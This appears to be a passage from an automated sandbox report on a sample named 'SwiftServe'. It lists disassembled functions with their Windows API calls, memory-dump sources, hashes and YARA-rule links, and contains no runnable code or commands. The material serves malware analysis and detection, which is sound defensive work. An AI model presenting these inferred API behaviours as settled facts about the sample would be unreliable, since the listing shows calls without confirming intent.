Instruction Fuzzy Hash: 833189309406085EFF35AB658C04BFBBBADAB85324F08539AE4AD721D1C33889478B61

Function 00E563F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E5642B
__isleadbyte_l.LIBCMT ref: 00E56459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E56487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E564BD

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e7042411d0a9ddebb76d87bff34d9fed78e75cc436637d55dc0cd082a903cac5
Instruction ID: 9e6f931e853fbcbb63aff5d4672e1369ca43001518d8d572e098bfdd37ee7fd5
Opcode Fuzzy Hash: e7042411d0a9ddebb76d87bff34d9fed78e75cc436637d55dc0cd082a903cac5
Instruction Fuzzy Hash: 6931F030600296AFDB218F75CC44BAB7BB9FF40326F555929EC34A7190EB31E858DB50

Function 00EA552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00EA553F

Part of subcall function 00E83B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E83B4E
Part of subcall function 00E83B34: GetCurrentThreadId.KERNEL32 ref: 00E83B55
Part of subcall function 00E83B34: AttachThreadInput.USER32(00000000,?,00E855C0), ref: 00E83B5C

GetCaretPos.USER32(?), ref: 00EA5550
ClientToScreen.USER32(00000000,?), ref: 00EA558B
GetForegroundWindow.USER32 ref: 00EA5591

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f8ac495d1f5af29b766916b52eefe01b89ea227cf66c9c5ace3a0930c86b7b2e
Instruction ID: 4225bfe67546a97256b55f071a0924eca474dc529a04ccb2dd32b906813e4e9e
Opcode Fuzzy Hash: f8ac495d1f5af29b766916b52eefe01b89ea227cf66c9c5ace3a0930c86b7b2e
Instruction Fuzzy Hash: 78311AB2900118AFDB10EFA5DC85DEFB7F9EF98304F10506AE415F7241EA71AE058BA0

Function 00EACB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

GetCursorPos.USER32(?), ref: 00EACB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E5BCEC,?,?,?,?,?), ref: 00EACB8F
GetCursorPos.USER32(?), ref: 00EACBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E5BCEC,?,?,?), ref: 00EACC16

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 536037e76c812243bddc678ced28965d32a5b24d538e6c8b9b3529974623cff3
Instruction ID: 01048f0dbcd28d2c6dd1364b36f3da0ac4e9f5a1f5cc77fc04c57be1bfb512d1
Opcode Fuzzy Hash: 536037e76c812243bddc678ced28965d32a5b24d538e6c8b9b3529974623cff3
Instruction Fuzzy Hash: 4431BD34600058AFCB258F59C889EFB7BF5EB4E310F144499F945AB261C332AD51EFA0

Function 00E40BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00E40BE2

Part of subcall function 00E3402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E87E51,?,?,00000000), ref: 00E34041
Part of subcall function 00E3402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E87E51,?,?,00000000,?,?), ref: 00E34065

_fprintf.LIBCMT ref: 00E40C19
OutputDebugStringW.KERNEL32(?), ref: 00E7694C

Part of subcall function 00E44CCA: _flsall.LIBCMT ref: 00E44CE3

__setmode.LIBCMT ref: 00E40C4E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 05db8f9078c5691a80f6443ae96e16c82e9faf627a872548aedbf9c22d21fb91
Instruction ID: 63a60334871ae6d08d7df88599b38cba7556f5ad71235ac509109949ba75eeb0
Opcode Fuzzy Hash: 05db8f9078c5691a80f6443ae96e16c82e9faf627a872548aedbf9c22d21fb91
Instruction Fuzzy Hash: C01127B1A04104AEDB08B7A4BC87AFEBBADDF41320F14615AF308761C2DF315C5697A1

Function 00E79274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E78D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E78D3F
Part of subcall function 00E78D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D49
Part of subcall function 00E78D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D58
Part of subcall function 00E78D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D5F
Part of subcall function 00E78D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E78D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E792C1
_memcmp.LIBCMT ref: 00E792E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E7931A
HeapFree.KERNEL32(00000000), ref: 00E79321

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: e8dce8921d2693ec77e10ffa1e79ad08fb015c4b34253a8e1218d8e5d995a4b0
Instruction ID: 7a2dbfd2b0d0d608ee950be6073020624a5b69c2977774952082a8e782302233
Opcode Fuzzy Hash: e8dce8921d2693ec77e10ffa1e79ad08fb015c4b34253a8e1218d8e5d995a4b0
Instruction Fuzzy Hash: 0C218C71E41108FFDB14DFA4D945BEEB7B8EF44305F059099E848B7292D774AA04CB90

Function 00EA634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00EA63BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EA63D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EA63E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EA63F3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 3f26254e83f171aecaae9090a09468d69e40c8abdd9cc22c05e36a17e795684a
Instruction ID: e3b2cf3587a5863cb8081a3cad7a46614a41ec6f1bad705ca095b79b21b74105
Opcode Fuzzy Hash: 3f26254e83f171aecaae9090a09468d69e40c8abdd9cc22c05e36a17e795684a
Instruction Fuzzy Hash: 6F11B131305524AFDB14AB24DC55FBB77D9EF8A320F185218F916EB2D1CB60BD058B94

Function 00E7E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E7F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E7E46F,?,?,?,00E7F262,00000000,000000EF,00000119,?,?), ref: 00E7F867
Part of subcall function 00E7F858: lstrcpyW.KERNEL32(00000000,?), ref: 00E7F88D
Part of subcall function 00E7F858: lstrcmpiW.KERNEL32(00000000,?,00E7E46F,?,?,?,00E7F262,00000000,000000EF,00000119,?,?), ref: 00E7F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E7F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E7E488
lstrcpyW.KERNEL32(00000000,?), ref: 00E7E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00E7F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E7E4E2

Strings

cdecl, xrefs: 00E7E4D9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 4b06d9c33c22592fb5f6bfc9e7dba776d5920837545d70946b59bca8ea82673f
Instruction ID: f6a2ea108c625aed6868ac489d4d888a6e3e4cd8e4410d7864064a5f022e2b1f
Opcode Fuzzy Hash: 4b06d9c33c22592fb5f6bfc9e7dba776d5920837545d70946b59bca8ea82673f
Instruction Fuzzy Hash: 9911D03A200345AFDB25AF34EC45D7A77A8FF49354B40916AF80ADB2A0FB31A940C791

Function 00E55312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00E55331

Part of subcall function 00E4593C: __FF_MSGBANNER.LIBCMT ref: 00E45953
Part of subcall function 00E4593C: __NMSG_WRITE.LIBCMT ref: 00E4595A
Part of subcall function 00E4593C: RtlAllocateHeap.NTDLL(01830000,00000000,00000001,?,?,?,?,00E41003,?,0000FFFF), ref: 00E4597F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 02eca01baf2dea3e05a53c7be4aaacbb153e244cc6b4be3d5d875c4fa414b373
Instruction ID: bb315f07d1a88650f8b34eded0024d84cbebb9751cb61ddf06754ddbc1227009
Opcode Fuzzy Hash: 02eca01baf2dea3e05a53c7be4aaacbb153e244cc6b4be3d5d875c4fa414b373
Instruction Fuzzy Hash: 07110433906A05AFCB203B70BC2469E37D89F143E6F106D2AFD1CBA1A0DF7089489780

Function 00E84365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E84385
_memset.LIBCMT ref: 00E843A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E843F8
CloseHandle.KERNEL32(00000000), ref: 00E84401

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 40db6acd3e210614346c5552cc1db3e964a01ffed90d8e5e03cdcff371d076ba
Instruction ID: 75856d2ea0bff117c43745c787f5043fef84eb307d023b48834e929a9a15a02f
Opcode Fuzzy Hash: 40db6acd3e210614346c5552cc1db3e964a01ffed90d8e5e03cdcff371d076ba
Instruction Fuzzy Hash: B311E7B19012287AD7309BA5AC4DFEBBB7CEF45764F00469AF908F71D0D2705E848BA4

Function 00E96A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E87E51,?,?,00000000), ref: 00E34041
Part of subcall function 00E3402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E87E51,?,?,00000000,?,?), ref: 00E34065

gethostbyname.WSOCK32(?,?,?), ref: 00E96A84
WSAGetLastError.WSOCK32(00000000), ref: 00E96A8F
_memmove.LIBCMT ref: 00E96ABC
inet_ntoa.WSOCK32(?), ref: 00E96AC7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 3db36a554f2f9bcf7abc82fd77fc68844d8564d1cf72d7b9d0bc20b5ebe0c4e8
Instruction ID: 142e67b80a3daa778032746760caaed20b1de2e0a5929797c3b8b25a49d80c5b
Opcode Fuzzy Hash: 3db36a554f2f9bcf7abc82fd77fc68844d8564d1cf72d7b9d0bc20b5ebe0c4e8
Instruction Fuzzy Hash: 68114F72600109AFCF04EBA4D946CEEBBF8AF58310B145165F506B72A2DF30AE04CB91

Function 00E796F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00E79719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E7972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E79741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E7975C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 20d1f457a6afbf0a00ab1b64ab9649674705fa584ba8f787255bcbed6fb3af8d
Instruction ID: d802c11feda3f14c5c41b23ab48fb15b3ae62cc14ea82615d9b8e16555bfb06d
Opcode Fuzzy Hash: 20d1f457a6afbf0a00ab1b64ab9649674705fa584ba8f787255bcbed6fb3af8d
Instruction Fuzzy Hash: 89114839900218FFEB11DF95C985E9EBBB8FF48710F204092E904B7294D6716E11DB90

Function 00E2166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

DefDlgProcW.USER32(?,00000020,?), ref: 00E216B4
GetClientRect.USER32(?,?), ref: 00E5B93C
GetCursorPos.USER32(?), ref: 00E5B946
ScreenToClient.USER32(?,?), ref: 00E5B951

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 489a6dea8f2f9031f4d611fc2d30ffa90c40f1d934adbf58a9e2f8e704cafef9
Instruction ID: 6f3b788687802786068a42cc35007b2222bd1cb23fbe4de9906a2f36658aba6e
Opcode Fuzzy Hash: 489a6dea8f2f9031f4d611fc2d30ffa90c40f1d934adbf58a9e2f8e704cafef9
Instruction Fuzzy Hash: FC113235A00129EFCB10EF98E8899BE77B9FB54301F041596E941F7140C330BA55CBA2

Function 00E22111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E2214F
GetStockObject.GDI32(00000011), ref: 00E22163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E2216D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: afe07752411f9d81a284d5a7a8395ccf1f622a495f6101bfce4f4a15a9e17b40
Instruction ID: ddaf27b2c275ae25495b14bdb2ee5e5aef7d2ce8e00f2e6a726f48a794f30f88
Opcode Fuzzy Hash: afe07752411f9d81a284d5a7a8395ccf1f622a495f6101bfce4f4a15a9e17b40
Instruction Fuzzy Hash: F011A17250216DBFEF024F91AC44EEBBB69EF58354F041216FB0462010CB31EC61DBA0

Function 00E81941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E804EC,?,00E8153F,?,00008000), ref: 00E8195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E804EC,?,00E8153F,?,00008000), ref: 00E81983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E804EC,?,00E8153F,?,00008000), ref: 00E8198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00E804EC,?,00E8153F,?,00008000), ref: 00E819C0

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 6e8de1e2d928955fd9f78970336c0dc321b04943905228f8a5a6783cdef6c3cf
Instruction ID: 070dcce1928eed0c09b75ad0b611231df678039c14c41376f2f569e6fb483bf6
Opcode Fuzzy Hash: 6e8de1e2d928955fd9f78970336c0dc321b04943905228f8a5a6783cdef6c3cf
Instruction Fuzzy Hash: 82117C31C0162DDBCF04AFE9E958AEEBB78FF48741F004195EA89B2240CB309651CB91

Function 00EAE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EAE1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00EAE201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00EAE216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00EAE234

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: a1b0ab75e6f9738db6d035e8cecc399140a2682bc2ffdae55e8513bea553a91f
Instruction ID: 44f30f44313e853a39d4bba4a14610848fe957d7e02c2ecd0befe4cac8f6decc
Opcode Fuzzy Hash: a1b0ab75e6f9738db6d035e8cecc399140a2682bc2ffdae55e8513bea553a91f
Instruction Fuzzy Hash: A31152752053059BE7308F51DD09FD37BBCEB05B04F108659A665EA160D7B4F5089BB1

Function 00E571E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00E5720B

Part of subcall function 00E578F2: __fltout2.LIBCMT ref: 00E5791B

__cftog_l.LIBCMT ref: 00E57231
__cftoe_l.LIBCMT ref: 00E57263

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 8aa789500a6af93c23719555bbf70f0d0b6d29d562e906aa9be01102d2a7685c
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 870192B604814EBBCF125E84EC01CED3F62BB19346F089915FE9868531D736C9B5EB91

